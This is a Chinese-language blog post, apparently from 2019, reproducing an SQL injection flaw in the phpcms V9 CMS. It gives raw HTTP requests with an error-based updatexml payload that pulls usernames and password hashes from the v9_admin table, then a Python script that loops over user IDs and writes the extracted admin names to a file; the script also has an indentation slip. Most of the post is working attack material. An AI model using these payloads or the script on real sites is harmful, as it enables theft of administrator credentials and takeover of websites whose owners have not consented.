phpcms V9 sql注入漏洞测试 

phpcms V9 版本存在SQL注入漏洞,漏洞复现如下

0x00 以GET方式访问如下链接,得到返回包里mvbpqw_siteid值:

  http://127.0.0.1/index.php?m=wap&c=index&a=init&siteid=1

0x01 构造SQL语句,将0x00中的mvbpqw_siteid值代入下面链接,以POST方式发起请求

POST /index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id%3d%25*27+and+updatexml(1%2cconcat(0x7e%2c(SELECT+distinct+concat(0x23%2cuserid%2c0x3a%2cusername%2c0x3a%2cpassword%2c0x23)+FROM+v9_admin+limit+0%2c1)%2c0x7e)%2c1)%23%26m%3d1%26f%32dhaha%26modelid%3d2%26catid%3d7%26 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=7af71p7ic4qbnsufnv3fq5vje3; mvbqw_siteid=ee08VgRWBQMBBAlVBAJQV1pYBFdUVVIABgIMAloB
Upgrade-Insecure-Requests: 1
content-Type:application/x-www-form-urlencoded
Content-Length: 53

userid_flash=2359AgdVBwJTUQUAAVYHClYLVQUBBwAABlNXAFsB

 

0x02 将0x01步中的json值代入下面链接中,以POST方式请求,显示敏感的报错信息

POST /index.php?m=content&c=down&a_k=673dVVRVAwcABAQBAAxWBlAMBgBWBgIBAFYEDwVLRlRRAUZfVUkRREJXFgsSEwoADhEFAxBQWFcTE0FTVkQBTVUJTFRIBlxZU1VAGQBNVAEfHGRxfHR1ZxMCWERDWQpWTEUHCgoGUkMYBEwDAxkWF1ZGXlAcAU4AUkpERFJCClRVAEhVHFZSG0BVR0JHWhEAHwRPBgMYFnVhKXwXQQk7VFwIDQtECVpaWUAUARwESkgDTABRGR0HGhBAXAoGFgIIUAQMBEIIXFNVWF1VDQdFB1JAXlANBhARH0RXSltVClRVAEZfRkdO HTTP/1.1
Host:127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=7af71p7ic4qbnsufnv3fq5vje3; mvbqw_siteid=ee08VgRWBQMBBAlVBAJQV1pYBFdUVVIABgIMAloB
Upgrade-Insecure-Requests: 1
content-Type:application/x-www-form-urlencoded
Content-Length: 53

userid_flash=2359AgdVBwJTUQUAAVYHClYLVQUBBwAABlNXAFsB

 0x03 漏洞复现完成,下面是python脚本测试

完整代码如下:
#!/usr/bin/env python 
# -*- coding:utf-8 -*-

import requests
import re

headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Connection": "close",
"Cookie": "PHPSESSID=f0cesl88cj5ji86120ea2kpak4",
"Upgrade-Insecure-Reque": "1",
"content-Type":"application/x-www-form-urlencoded",
"Content-Length": "0"
 }

def get_1_url(num):
    url_1 = "http://127.0.0.1/index.php?m=wap&c=index&a=init&siteid=1"
    response_1 = requests.get(url_1,headers=headers)
    cookie = response_1.headers["Set-Cookie"][13:]
    get_2_url(cookie,num)

def get_2_url(cookie,num):
#拼接字符串,截取报错信息中的部分信息内容
    # url_2 = "http://127.0.0.1/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id%3d%25*27+and+updatexml(1%2cconcat(0x7e%2c(SELECT+" \
    #         "substring((password)%2c30%2c40)+FROM+v9_admin+where+userid%3d{}))%2c1)%23%26m%3d1%26f%3dhanwei%26modelid%3d2%26catid%3d7%26".format(str(num))   
#报错显示用户名
    url_2 = "http://127.0.0.1/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id%3d%25*27+and+updatexml(1%2cconcat(0x7e%2c(SELECT+substring" \
            "((username)%2c1%2c40)+FROM+v9_admin+where+userid%3d{}))%2c1)%23%26m%3d1%26f%3dhanwei%26modelid%3d2%26catid%3d7%26".format(str(num))

    data = {
        "userid_flash" : cookie
    }
    response_2 = requests.post(url_2,data=data,headers=headers)
    cookie_2 = response_2.headers["Set-Cookie"][15:]
    get_3_url(cookie,cookie_2)

def get_3_url(cookie,cookie_2):
    url_3 = "http://127.0.0.1/index.php?m=content&c=down&a_k={}".format(cookie_2)
 data = {
        "userid_flash": cookie
    }
    response_3 = requests.post(url_3, data=data, headers=headers)
    if "XPATH syntax error" in response_3.text:
        hs_str = response_3.text
        hs_user = re.findall(r".*Message : </b> XPATH syntax error: '(.*?)' <br />",str(hs_str), re.S)[0]
        with open("hs_user_add_V.txt","a+",encoding="utf-8") as f:
            f.write(hs_user+"\n")
        print(hs_user)

if __name__ =="__main__":
    for num in range(1,100):
        get_1_url(num)
posted @ 2019-05-16 15:09  g7y12  阅读(807)  评论(0)    收藏  举报